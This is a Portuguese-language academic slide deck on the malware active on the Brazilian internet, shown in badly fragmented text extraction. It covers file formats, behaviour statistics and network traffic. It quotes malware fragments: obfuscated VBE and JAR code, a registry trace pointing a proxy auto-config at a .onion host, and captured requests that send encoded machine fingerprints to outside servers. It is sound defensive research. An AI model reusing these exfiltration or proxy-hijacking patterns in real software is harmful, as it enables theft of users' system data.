Análise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou?

An´

alise do Malware Ativo na Internet Brasileira:

4 anos depois. O que mudou?

Marcus Botacin

1

1

_{Universidade Federal do Paran´}

_{a (UFPR)}

mfbotacin@inf.ufpr.br

@MarcusBotacin

T´

opicos

1

Introduc

¸˜

ao

O processo de infecc

¸˜

ao

2

An´

alise dos Exemplares Coletados

Formatos de Arquivos

Comportamentos Maliciosos

Tr´

afego de Rede

3

Conclus˜

oes

Era uma vez...

Era uma vez...

Era uma vez...

Era uma vez...

Era uma vez...

T´

opicos

1

Introduc

¸˜

ao

O processo de infecc

¸˜

ao

2

An´

alise dos Exemplares Coletados

Formatos de Arquivos

Comportamentos Maliciosos

Tr´

afego de Rede

3

Conclus˜

oes

Limitac

¸˜

oes

Conclus˜

oes

Diversidade de Formatos.

10%

20%

30%

40%

50%

60%

70%

80%

90%

100%

Samples (%)

Evolution of threat’s filetype

PE

CPL

.NET

DLL

JAR

JS

VBE

Ameac¸as VBE

1

Set N i c s = o b J W M I S e r v i c e . E x E c Q u e r y ( " S E L E C T ␣ * ␣ F R O M ␣

W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n ␣ W H E R E ␣

I P E n a b l e d ␣ = ␣ T r u e " )

C´

odigo 1:

Exemplar de malware VBE obtendo informac

¸˜

oes de sistema

atrav´

es da consulta SQL as bases de dados.

1

set o b j S h e l l = C r e a t e O b j e c t ( C r y p t X o r ( " c0 +\4 " , " N0X " )

& " . A p p l i c a t i o n " )

C´

odigo 2:

Exemplar de malware VBE instanciando um objeto a partir

de uma string codificada usando operac

¸˜

oes XOR.

Ameac¸as JAVA

1

p u b l i c s t a t i c v o i d m a i n ( S t r i n g a r g s []) {

2

F i l e j s j m j 3 1 9 4 = new F i l e (( new S t r i n g B u i l d e r (

S t r i n g . v a l u e O f ( b c v s n p d b x w 4 0 9 5 ( " T H K H B I ... " ,

a b d w w h f t j b 7 7 4 3 ) ) ) ) . a p p e n d ( " x " ) . t o S t r i n g () ) ;

C´

odigo 3:

Exemplar de malware JAR ofuscado.

1

if ( j s j m j 3 1 9 4 . e x i s t s () )

2

S y s t e m . e x i t (1) ;

C´

odigo 4:

Exemplar de malware JAR confirmando a infecc

¸˜

ao.

Ameac¸as JavaScript

1

. p r o t o c o l === " h t t p s : " ? " h t t p s :// s . " : " h t t p :// e . " )

+ " . s e r v e r . com / q . js "

C´

odigo 6:

Exemplar de malware Javascript construindo uma URL em

tempo de execuc

¸˜

ao.

T´

opicos

1

Introduc

¸˜

ao

O processo de infecc

¸˜

ao

2

An´

alise dos Exemplares Coletados

Formatos de Arquivos

Comportamentos Maliciosos

Tr´

afego de Rede

3

Conclus˜

oes

Como os exemplares s˜

ao detectados?

0%

10%

20%

30%

PSW

Win32

Delf

_Luhe

Delfi

Inject2

Comportamentos Observados

Tabela:

Comparac

¸˜

ao dos comportamentos observados no dataset

brasileiro e no trabalho de Bayer et al.

Comportamento

Brasil

Bayer et al. (2009)

Alterac

¸˜

ao de hosts

0.09%

1.97%

Criac

¸˜

ao de arquivos

24.64%

70.78%

Remoc¸˜

ao de arquivos

12.09%

42.57%

Modificac

¸˜

ao de arquivos

16.09%

79.87%

Instalac

¸˜

ao de BHOs

1.03%

1.72%

Tr´

afego de Rede

96.47%

55.18%

Configurac¸˜

ao Autom´

atica de Proxy (PAC).

m a l w a r e . exe | S e t V a l u e K e y | H K C U \ S o f t w a r e \ M i c r o s o f t \

I n t e r n e t E x p l o r e r \ S e a r c h S c o p e s \{ ID }| O S D F i l e U R L |

f i l e : // / C :/ U s e r s / W i n 7 / A p p D a t a / L o c a l / T N T 2 /

P r o f i l e s / e 0 e 6 3 d c b b 2 9 a 2 1 8 0 f 8 3 0 0 /

o s e 0 e 6 3 d c b b 2 9 a 2 1 8 0 f 8 3 0 0 . xml

C´

odigo 7:

Trecho de um trac

¸o de execuc

¸˜

ao de um exemplar de

malware definindo uma configurac

¸˜

ao de proxy via arquivo PAC.

1

m a l w a r e . exe | S e t V a l u e K e y | H K C U \ S o f t w a r e \ M i c r o s o f t \

W i n d o w s \ C u r r e n t V e r s i o n \ I n t e r n e t S e t t i n g s |

A u t o C o n f i g U R L | h t t p : // p 3 v r a m f c x 4 y b p v n j . o n i o n /

B l 5 C H r Z V . js ? ip = 1 4 3 . 1 0 6 . Y . Z

T´

opicos

1

Introduc

¸˜

ao

O processo de infecc

¸˜

ao

2

An´

alise dos Exemplares Coletados

Formatos de Arquivos

Comportamentos Maliciosos

Tr´

afego de Rede

3

Conclus˜

oes

Uso de Protocolos

Tabela:

Comparac

¸˜

ao do tr´

afego de rede exibido pelos exemplares de

malware brasileiros e os observador por Bayer et al.

Protocolo

2012(T)

2013(T)

2014(T)

2015(T)

2016(T)

2017(T)

Bayer(09)

TCP

40.87%

41.24%

56.19%

64.24%

74.86%

84.85%

45.74%

UDP

52.76%

54.74%

52.00%

59.42%

74.86%

84.85%

27.34%

ICMP

1.28%

1.70%

1.33%

5.63%

0.57%

1.17%

7.58%

DNS

52.69%

54.73%

51.98%

49.04%

47.43%

74.59%

24.53%

HTTP

38.63%

39.69%

52.03%

44.93%

74.86%

84.38%

20.75%

SSL

5.30%

5.62%

4.64%

6.53%

10.29%

26.57%

0.23%

SMTP

0.21%

0.01%

0.06%

0.21%

0.0%

0.0%

N.A.

Exfiltrac¸˜

ao de Informac¸˜

oes.

1

GET m a i s u m a v e z c o n t a . i n f o / e s c r i t a /? C l i e n t =

Y 2 9 u d G F k b 3 I w M w ==& G e t M a c A d d r e s s =

N T I 6 N T Q 6 M D A 6 Q T A 6 M D Q 6 M T k =&

G e t W i n V e r s i o n A s S t r i n g W i n A r c h = V 2 l u Z G 9 3 c y A 3 I C g 2 N C k

=& V e r s a o M o d u l o = djE =& G e t P C N a m e = V 0 l O N 1 9 W T T E =&

D e t e c t P l u g i n = T u N v & D e t e c t A n t i V i r u s = T 0 Z G

C´

odigo 9:

Trecho de um tr´

afego de rede exemplificando um exemplar

de malware que realiza o fingerprint da m´

aquina infectada.

1

GET c o u n t e r 1 . w e b c o n t a d o r e s . com : 8 0 8 0 / p r i v a t e / p o i n t e u r

/ p o i n t e u r . gif ?| < hash > | 6 0 0 * 8 0 0 | pt |32| < serial >|

c o m p u t e r | w i n d o w s |7| i n t e r n e t +\ e x p l o r e r |7| B r a z i l |

Dom´ınios Contatados

Tabela:

Tr´

afego de Rede por dom´ınio (top-10).

% Exemplares

% Payloads

Host

22.45%

None

google.com

22.43%

None

google-public-dns-a.google.com

5.34%

9.71%

akamaitechnologies.com

4.50%

8.18

1e100.net

3.32%

6.04

amazonaws.com

1.50%

2.73

clouduol.com.br

1.27%

2.31

locaweb.com.br

T´

opicos

1

Introduc

¸˜

ao

O processo de infecc

¸˜

ao

2

An´

alise dos Exemplares Coletados

Formatos de Arquivos

Comportamentos Maliciosos

Tr´

afego de Rede

3

Conclus˜

oes

Limitac

¸˜

oes

Conclus˜

oes

Limitac¸˜

oes & Trabalhos Futuros

Limitac¸˜

oes

Apenas sistemas Windows.

Apenas aplicac¸˜

oes em modo usu´

ario.

Trabalhos Futuros

Ampliac

¸˜

ao das an´

alises.

Monitorac

¸˜

ao cont´ınua.

Colaborac

¸˜

oes e Parcerias.

T´

opicos

1

Introduc

¸˜

ao

O processo de infecc

¸˜

ao

2

An´

alise dos Exemplares Coletados

Formatos de Arquivos

Comportamentos Maliciosos

Tr´

afego de Rede

3

Conclus˜

oes

Limitac

¸˜

oes

Conclus˜

oes

Conclus˜

oes

Principais Descobertas

Infecc

¸˜

oes via phishing.

Aplicac

¸˜

oes falsas.

Variados formatos de arquivo.

Exfiltrac

¸˜

ao de informac

¸˜

oes sens´ıveis.

Armazenamento em servic

¸os de nuvem.

Chamado para Ac¸˜

ao!

T´

opicos

1

Introduc

¸˜

ao

O processo de infecc

¸˜

ao

2

An´

alise dos Exemplares Coletados

Formatos de Arquivos

Comportamentos Maliciosos

Tr´

afego de Rede

3

Conclus˜

oes

Contato

mfbotacin@inf.ufpr.br

@MarcusBotacin